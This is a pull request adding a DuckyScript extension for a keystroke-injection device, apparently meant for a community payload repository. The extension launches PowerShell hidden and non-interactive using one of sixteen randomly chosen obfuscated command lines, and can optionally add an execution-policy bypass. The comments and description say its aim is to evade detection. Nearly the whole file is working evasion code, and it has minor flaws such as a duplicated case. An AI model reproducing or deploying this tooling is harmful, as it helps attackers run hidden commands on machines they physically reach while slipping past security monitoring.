### PR TITLE
Created Extension: Rolling_Powershell_Execution

### DIFF
--- a/payloads/extensions/community/Rolling_Powershell_Execution
+++ b/payloads/extensions/community/Rolling_Powershell_Execution
@@ -11,70 +11,68 @@ EXTENSION Rolling_Powershell_Execution
     DEFINE #EXECUTIONPOLICY FALSE
     DEFINE #DELAY 200
 
-$_RANDOM_MIN = 1
-$_RANDOM_MAX = 16
-VAR $RANDOM_PS = $_RANDOM_INT
-FUNCTION Rolling_Powershell_Execution()
-    IF ($RANDOM_PS == 1) THEN
-        STRING cmd.exe /c "p%PSModulePath:~21,1%weRshe%PUBLIC:~12,1%l.exe -noPr -Noni -wi Hid"
-    ELSE IF ($RANDOM_PS == 2) THEN
-        STRING cmd.exe /c "PowerShe%PUBLIC:~12,1%%PUBLIC:~12,1% /NoPr /NonI /w hi"
-    ELSE IF ($RANDOM_PS == 3) THEN
-        STRING cmd.exe /c "P%PSModulePath:~21,1%werShell /NoPr /NonI /w hi"
-    ELSE IF ($RANDOM_PS == 4) THEN
-        STRING cmd /c "FOR /F "delims=s\ t%PSModulePath:~25,1%kens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni /w H"
-    ELSE IF ($RANDOM_PS == 5) THEN
-        STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell -NoPr -NonI -w hi"
-    ELSE IF ($RANDOM_PS == 6) THEN
-        STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell /NoPr /Nonin /wind hidD"
-    ELSE IF ($RANDOM_PS == 7) THEN
-        STRING cmd.exe /c "P%PSModulePath:~21,1%werShell -NoPr -NonI -w hi"
-    ELSE IF ($RANDOM_PS == 8) THEN
-        STRING powershell -NoPro -noninT -win h
-    ELSE IF ($RANDOM_PS == 9) THEN
-        STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell -NoP -Noni -wind hidD"
-    ELSE IF ($RANDOM_PS == 2) THEN
-        STRING powershell.exe -NoP -nOni -W h
-    ELSE IF ($RANDOM_PS == 10) THEN
-        STRING cmd /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni -w H"
-    ELSE IF ($RANDOM_PS == 11) THEN
-        STRING powershell -nopr -noninT -W HiddEn
-    ELSE IF ($RANDOM_PS == 12) THEN
-        STRING cmd.exe /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -noProF -nonin -win Hi"
-    ELSE IF ($RANDOM_PS == 13) THEN
-        STRING cmd /c "P%PSModulePath:~25,1%weRShell -noProf -NonIn -wi h"
-    ELSE IF ($RANDOM_PS == 14) THEN
-        STRING powershell -noproF -noni -W Hi
-    ELSE IF ($RANDOM_PS == 15) THEN
-        STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell /NoPr /NonI /%PSModulePath:~17,1% hi"
-    ELSE ($RANDOM_PS == 16) THEN
-        STRING powershell.exe -noP -nOnI -windo H
-    END_IF
+    $_RANDOM_MIN = 1
+    $_RANDOM_MAX = 16
+    VAR $RANDOM_PS = $_RANDOM_INT
+    FUNCTION Rolling_Powershell_Execution()
+        IF ($RANDOM_PS == 1) THEN
+            STRING cmd.exe /c "p%PSModulePath:~21,1%weRshe%PUBLIC:~12,1%l.exe -noPr -Noni -wi Hid"
+        ELSE IF ($RANDOM_PS == 2) THEN
+            STRING cmd.exe /c "PowerShe%PUBLIC:~12,1%%PUBLIC:~12,1% /NoPr /NonI /w hi"
+        ELSE IF ($RANDOM_PS == 3) THEN
+            STRING cmd.exe /c "P%PSModulePath:~21,1%werShell /NoPr /NonI /w hi"
+        ELSE IF ($RANDOM_PS == 4) THEN
+            STRING cmd /c "FOR /F "delims=s\ t%PSModulePath:~25,1%kens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni /w H"
+        ELSE IF ($RANDOM_PS == 5) THEN
+            STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell -NoPr -NonI -w hi"
+        ELSE IF ($RANDOM_PS == 6) THEN
+            STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell /NoPr /Nonin /wind hidD"
+        ELSE IF ($RANDOM_PS == 7) THEN
+            STRING cmd.exe /c "P%PSModulePath:~21,1%werShell -NoPr -NonI -w hi"
+        ELSE IF ($RANDOM_PS == 8) THEN
+            STRING powershell -NoPro -noninT -win h
+        ELSE IF ($RANDOM_PS == 9) THEN
+            STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell -NoP -Noni -wind hidD"
+        ELSE IF ($RANDOM_PS == 2) THEN
+            STRING powershell.exe -NoP -nOni -W h
+        ELSE IF ($RANDOM_PS == 10) THEN
+            STRING cmd /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni -w H"
+        ELSE IF ($RANDOM_PS == 11) THEN
+            STRING powershell -nopr -noninT -W HiddEn
+        ELSE IF ($RANDOM_PS == 12) THEN
+            STRING cmd.exe /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -noProF -nonin -win Hi"
+        ELSE IF ($RANDOM_PS == 13) THEN
+            STRING cmd /c "P%PSModulePath:~25,1%weRShell -noProf -NonIn -wi h"
+        ELSE IF ($RANDOM_PS == 14) THEN
+            STRING powershell -noproF -noni -W Hi
+        ELSE IF ($RANDOM_PS == 15) THEN
+            STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell /NoPr /NonI /%PSModulePath:~17,1% hi"
+        ELSE ($RANDOM_PS == 16) THEN
+            STRING powershell.exe -noP -nOnI -windo H
+        END_IF
 
-IF_DEFINED #EXECUTIONPOLICY
-    SPACE
-    IF (($RANDOM_PS % 2) == 0) THEN
-        STRING -ep ByPasS
-    ELSE IF (($RANDOM_PS % 5) == 0) THEN
-        STRING -exec bypass
-    ELSE IF (($RANDOM_PS % 7) == 0) THEN
-        STRING -exeC byPasS
-    ELSE IF (($RANDOM_PS % 10) == 0) THEN
-        STRING -exEcUtionPoL bYpaSs
-    ELSE IF (($RANDOM_PS % 12) == 0) THEN
-        STRING -exEcUtion bYPaSs
-    ELSE
-        STRING -eP BYPaSs
-    END_IF
-END_IF_DEFINED
-ENTER
-DELAY #DELAY
-END_FUNCTION
-    
+    IF_DEFINED #EXECUTIONPOLICY
+        SPACE
+        IF (($RANDOM_PS % 2) == 0) THEN
+            STRING -ep ByPasS
+        ELSE IF (($RANDOM_PS % 5) == 0) THEN
+            STRING -exec bypass
+        ELSE IF (($RANDOM_PS % 7) == 0) THEN
+            STRING -exeC byPasS
+        ELSE IF (($RANDOM_PS % 10) == 0) THEN
+            STRING -exEcUtionPoL bYpaSs
+        ELSE IF (($RANDOM_PS % 12) == 0) THEN
+            STRING -exEcUtion bYPaSs
+        ELSE
+            STRING -eP BYPaSs
+        END_IF
+    END_IF_DEFINED
+    ENTER
+    DELAY #DELAY
+    END_FUNCTION
     REM EXAMPLE USAGE AFTER EXTENSION
     REM DELAY 2000
     REM GUI r
     REM DELAY 2000
     REM Rolling_Powershell_Execution()
-
 END_EXTENSION

--- a/payloads/extensions/community/Rolling_Powershell_Execution
+++ b/payloads/extensions/community/Rolling_Powershell_Execution
@@ -1,0 +1,80 @@
+EXTENSION Rolling_Powershell_Execution
+    REM VERSION 1.0
+    REM Author: 0iphor13
+    REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek
+    REM Requirements: PayloadStudio v.1.3 minimum
+    REM Starts Powershell in uncommon ways to avoid basic detection
+    REM Via randomisation, obfuscation and usage of less used parameters, this extension helps to evade basic detection.
+
+    REM CONFIGURATION:
+    REM Add ExecutionPolicy bypass
+    DEFINE #EXECUTIONPOLICY FALSE
+    DEFINE #DELAY 200
+
+$_RANDOM_MIN = 1
+$_RANDOM_MAX = 16
+VAR $RANDOM_PS = $_RANDOM_INT
+FUNCTION Rolling_Powershell_Execution()
+    IF ($RANDOM_PS == 1) THEN
+        STRING cmd.exe /c "p%PSModulePath:~21,1%weRshe%PUBLIC:~12,1%l.exe -noPr -Noni -wi Hid"
+    ELSE IF ($RANDOM_PS == 2) THEN
+        STRING cmd.exe /c "PowerShe%PUBLIC:~12,1%%PUBLIC:~12,1% /NoPr /NonI /w hi"
+    ELSE IF ($RANDOM_PS == 3) THEN
+        STRING cmd.exe /c "P%PSModulePath:~21,1%werShell /NoPr /NonI /w hi"
+    ELSE IF ($RANDOM_PS == 4) THEN
+        STRING cmd /c "FOR /F "delims=s\ t%PSModulePath:~25,1%kens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni /w H"
+    ELSE IF ($RANDOM_PS == 5) THEN
+        STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell -NoPr -NonI -w hi"
+    ELSE IF ($RANDOM_PS == 6) THEN
+        STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell /NoPr /Nonin /wind hidD"
+    ELSE IF ($RANDOM_PS == 7) THEN
+        STRING cmd.exe /c "P%PSModulePath:~21,1%werShell -NoPr -NonI -w hi"
+    ELSE IF ($RANDOM_PS == 8) THEN
+        STRING powershell -NoPro -noninT -win h
+    ELSE IF ($RANDOM_PS == 9) THEN
+        STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell -NoP -Noni -wind hidD"
+    ELSE IF ($RANDOM_PS == 2) THEN
+        STRING powershell.exe -NoP -nOni -W h
+    ELSE IF ($RANDOM_PS == 10) THEN
+        STRING cmd /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni -w H"
+    ELSE IF ($RANDOM_PS == 11) THEN
+        STRING powershell -nopr -noninT -W HiddEn
+    ELSE IF ($RANDOM_PS == 12) THEN
+        STRING cmd.exe /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -noProF -nonin -win Hi"
+    ELSE IF ($RANDOM_PS == 13) THEN
+        STRING cmd /c "P%PSModulePath:~25,1%weRShell -noProf -NonIn -wi h"
+    ELSE IF ($RANDOM_PS == 14) THEN
+        STRING powershell -noproF -noni -W Hi
+    ELSE IF ($RANDOM_PS == 15) THEN
+        STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell /NoPr /NonI /%PSModulePath:~17,1% hi"
+    ELSE ($RANDOM_PS == 16) THEN
+        STRING powershell.exe -noP -nOnI -windo H
+    END_IF
+
+IF_DEFINED #EXECUTIONPOLICY
+    SPACE
+    IF (($RANDOM_PS % 2) == 0) THEN
+        STRING -ep ByPasS
+    ELSE IF (($RANDOM_PS % 5) == 0) THEN
+        STRING -exec bypass
+    ELSE IF (($RANDOM_PS % 7) == 0) THEN
+        STRING -exeC byPasS
+    ELSE IF (($RANDOM_PS % 10) == 0) THEN
+        STRING -exEcUtionPoL bYpaSs
+    ELSE IF (($RANDOM_PS % 12) == 0) THEN
+        STRING -exEcUtion bYPaSs
+    ELSE
+        STRING -eP BYPaSs
+    END_IF
+END_IF_DEFINED
+ENTER
+DELAY #DELAY
+END_FUNCTION
+    
+    REM EXAMPLE USAGE AFTER EXTENSION
+    REM DELAY 2000
+    REM GUI r
+    REM DELAY 2000
+    REM Rolling_Powershell_Execution()
+
+END_EXTENSION


### PR DESCRIPTION
Start Powershell in different ways through obfuscation, uncommon start paramters and randomisation. This extension may help to evade basic and bad detection methods of starting powershell.